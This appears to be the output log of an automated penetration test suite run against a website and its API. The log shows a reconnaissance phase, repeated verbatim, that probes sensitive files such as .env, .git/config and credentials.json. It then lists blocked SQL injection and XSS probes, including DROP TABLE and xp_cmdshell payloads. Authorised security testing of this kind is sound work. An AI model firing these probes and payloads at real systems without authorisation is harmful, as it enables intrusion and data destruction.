════════════════════════════════════════════════════════════
PQCrypta Pentest Suite — Sat May 23 17:09:09 UTC 2026
Target : https://pqcrypta.com
API : https://api.pqcrypta.com
Attacker: 74.208.108.89
════════════════════════════════════════════════════════════
┌─ Phase 1 │ Reconnaissance
│
│ === RECONNAISSANCE ===
│ --- Server Headers ---
│ HTTP/2 403
│ content-type: text/plain; charset=utf-8
│ x-waf-block: 1
│ x-ratelimit-limit: 100
│ x-ratelimit-remaining: 99
│ content-length: 34
│ date: Sat, 23 May 2026 17:09:10 GMT
│
│
│ --- API Server Headers ---
│ HTTP/2 403
│ content-type: text/plain; charset=utf-8
│ x-waf-block: 1
│ x-ratelimit-limit: 100
│ x-ratelimit-remaining: 99
│ content-length: 34
│ date: Sat, 23 May 2026 17:09:10 GMT
│
│
│ --- Error Page Fingerprint ---
│
│ --- Sensitive File Exposure ---
│ [!403] /.env (34b)
│ [!403] /.env.local (34b)
│ [!403] /.env.production (34b)
│ [!403] /.env.backup (34b)
│ [!403] /.git/config (34b)
│ [!403] /.git/HEAD (34b)
│ [!403] /.git/COMMIT_EDITMSG (34b)
│ [!403] /composer.json (34b)
│ [!403] /composer.lock (34b)
│ [!403] /package.json (34b)
│ [!403] /config.php (34b)
│ [!403] /config/config.php (34b)
│ [!403] /wp-config.php (34b)
│ [!403] /database.yml (34b)
│ [!403] /secrets.yml (34b)
│ [!403] /credentials.json (34b)
│ [!403] /backup.sql (34b)
│ [!403] /dump.sql (34b)
│ [!403] /db.sql (34b)
│ [!403] /admin/ (34b)
│ [!403] /admin/index.php (34b)
│ [!403] /administrator/ (34b)
│ [!403] /.DS_Store (34b)
│ [!403] /Thumbs.db (34b)
│ [!403] /server-status (34b)
│ [!403] /server-info (34b)
│ [!403] /phpinfo.php (34b)
│ [!403] /info.php (34b)
│ [!403] /test.php (34b)
│ [!403] /crossdomain.xml (34b)
│ [!403] /clientaccesspolicy.xml (34b)
│ [!403] /robots.txt (34b)
│ [!403] /sitemap.xml (34b)
│ [!403] /.well-known/security.txt (34b)
│ [!403] /api/swagger (34b)
│ [!403] /api/openapi.json (34b)
│ [!403] /api/docs (34b)
│ [!403] /v1/ (34b)
│ [!403] /api/v1/ (34b)
│ [!403] /api/v2/ (34b)
│
│ --- DNS Records ---
│ 66.179.95.51
│ 66.179.95.51
│ 0 pqcrypta-com.mail.protection.outlook.com.
│ "v=spf1 include:secureserver.net -all"
│ "NETORG19344809.onmicrosoft.com"
│ "google-site-verification=N6zaNocPQF_AizabWBXgSftzhJTl4TPJXWTJ_FlLG3Q"
│ === RECONNAISSANCE ===
│ --- Server Headers ---
│ HTTP/2 403
│ content-type: text/plain; charset=utf-8
│ x-waf-block: 1
│ x-ratelimit-limit: 100
│ x-ratelimit-remaining: 99
│ content-length: 34
│ date: Sat, 23 May 2026 17:09:10 GMT
│
│
│ --- API Server Headers ---
│ HTTP/2 403
│ content-type: text/plain; charset=utf-8
│ x-waf-block: 1
│ x-ratelimit-limit: 100
│ x-ratelimit-remaining: 99
│ content-length: 34
│ date: Sat, 23 May 2026 17:09:10 GMT
│
│
│ --- Error Page Fingerprint ---
│
│ --- Sensitive File Exposure ---
│ [!403] /.env (34b)
│ [!403] /.env.local (34b)
│ [!403] /.env.production (34b)
│ [!403] /.env.backup (34b)
│ [!403] /.git/config (34b)
│ [!403] /.git/HEAD (34b)
│ [!403] /.git/COMMIT_EDITMSG (34b)
│ [!403] /composer.json (34b)
│ [!403] /composer.lock (34b)
│ [!403] /package.json (34b)
│ [!403] /config.php (34b)
│ [!403] /config/config.php (34b)
│ [!403] /wp-config.php (34b)
│ [!403] /database.yml (34b)
│ [!403] /secrets.yml (34b)
│ [!403] /credentials.json (34b)
│ [!403] /backup.sql (34b)
│ [!403] /dump.sql (34b)
│ [!403] /db.sql (34b)
│ [!403] /admin/ (34b)
│ [!403] /admin/index.php (34b)
│ [!403] /administrator/ (34b)
│ [!403] /.DS_Store (34b)
│ [!403] /Thumbs.db (34b)
│ [!403] /server-status (34b)
│ [!403] /server-info (34b)
│ [!403] /phpinfo.php (34b)
│ [!403] /info.php (34b)
│ [!403] /test.php (34b)
│ [!403] /crossdomain.xml (34b)
│ [!403] /clientaccesspolicy.xml (34b)
│ [!403] /robots.txt (34b)
│ [!403] /sitemap.xml (34b)
│ [!403] /.well-known/security.txt (34b)
│ [!403] /api/swagger (34b)
│ [!403] /api/openapi.json (34b)
│ [!403] /api/docs (34b)
│ [!403] /v1/ (34b)
│ [!403] /api/v1/ (34b)
│ [!403] /api/v2/ (34b)
│
│ --- DNS Records ---
│ 66.179.95.51
│ 66.179.95.51
│ 0 pqcrypta-com.mail.protection.outlook.com.
│ "v=spf1 include:secureserver.net -all"
│ "NETORG19344809.onmicrosoft.com"
│ "google-site-verification=N6zaNocPQF_AizabWBXgSftzhJTl4TPJXWTJ_FlLG3Q"
└─ [PASS ] findings=0 warns=0 time=12s
┌─ Phase 2 │ WAF Bypass
│
│ === WAF BYPASS TESTS ===
│
│ --- SQL Injection Probes ---
│ [403] SQL: ' OR 1=1--
│ [403] SQL: 1; DROP TABLE users--
│ [403] SQL: ' UNION SELECT * FROM information_schema.tables--
│ [403] SQL: admin'--
│ [403] SQL: 1' AND SLEEP(5)--
│ [403] SQL: 1 OR 1=1
│ [403] SQL: '; EXEC xp_cmdshell('dir')--
│
│ --- XSS Probes ---
│ [403] XSS:
│ [403] XSS:
│ [403] XSS: javascript:alert(1)
│ [403] XSS: